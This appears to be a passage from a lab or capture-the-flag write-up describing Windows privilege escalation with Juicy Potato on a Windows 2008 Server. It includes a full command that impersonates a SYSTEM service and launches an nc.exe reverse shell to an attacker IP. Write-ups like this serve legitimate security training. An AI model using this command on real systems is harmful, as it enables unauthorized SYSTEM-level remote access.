Privilege Escalation

First thing I did was look for a way to improve my netcat shell, which is something I immediately do with Linux Machines as well. As soon as I get foothold I use socat to get an improved shell.

For that I checked the arch of the machine just so i can generate a meterpreter shell just in case things go south I am able to use Metasploit's modules to check for Kernel Exploits if I am not able to figure it out on my own.

After improving my shell I checked the permissions and the privilege this use had and boom.

This is easy money because we can impersonate services that are running as NT/Authority and get a shell with that permission.

I present to you Juicy Potato.

First things first. We upload nc.exe to the machine, I am sure you can use a msfvenom generated payload but I rather stick to the way I learned how to do this attack.

The credits go to ElevateCyber on youtube.

We figure out based on the past enumeration what version of Windows we are on.

Based on the previous command we can see that we are in a Windows 2008 Server. Hence we are going to follow this link to get the CLSID of the service we wish to impersonate.

We are going to note the CLSID, also take into consideration that if the first one doesn't work try the other one until one of them will work.

Now use this binary and upload it to the windows machine.

Then use the following command and listen on whicever port you command nc.exe to do so. 

Juicy.Potato.x86.exe -t * -l 1337 -c "{03ca98d6-ff5d-49b8-abc6-03dd84127020}" -p C:\Windows\System32\cmd.exe -a "/c C:\Users\jill\Documents\nc.exe -e cmd.exe 192.168.119.231 33123"

And we got nt/authority system.

PreviousInitial Foothold

Last updated